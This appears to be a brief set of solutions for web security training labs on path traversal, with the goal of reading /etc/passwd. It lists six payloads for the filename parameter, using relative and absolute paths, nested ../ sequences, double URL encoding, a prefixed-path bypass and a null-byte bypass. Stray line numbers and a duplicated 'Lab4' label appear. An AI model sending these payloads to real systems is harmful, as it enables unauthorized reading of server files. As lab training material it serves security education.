Goal: Read /etc/passwd
Lab Solutions
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
Lab1 - Basic:
/image?filename=../../../../../../../etc/passwd
Lab2 - Absolute Path:
/image?filename=/etc/passwd
Lab3 - Recursively removing ../:
/image?filename=....//....//....//etc/passwd
Lab4 - Wack URL Encoding:
..%252f..%252f..%252fetc%252fpasswd
[Resource for this one](https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work).
Lab4 - Path Verification:
/image?filename=/var/www/images/../../../etc/passwd
Lab5 - Null Byte:
/image?filename=/../../../etc/passwd%00.png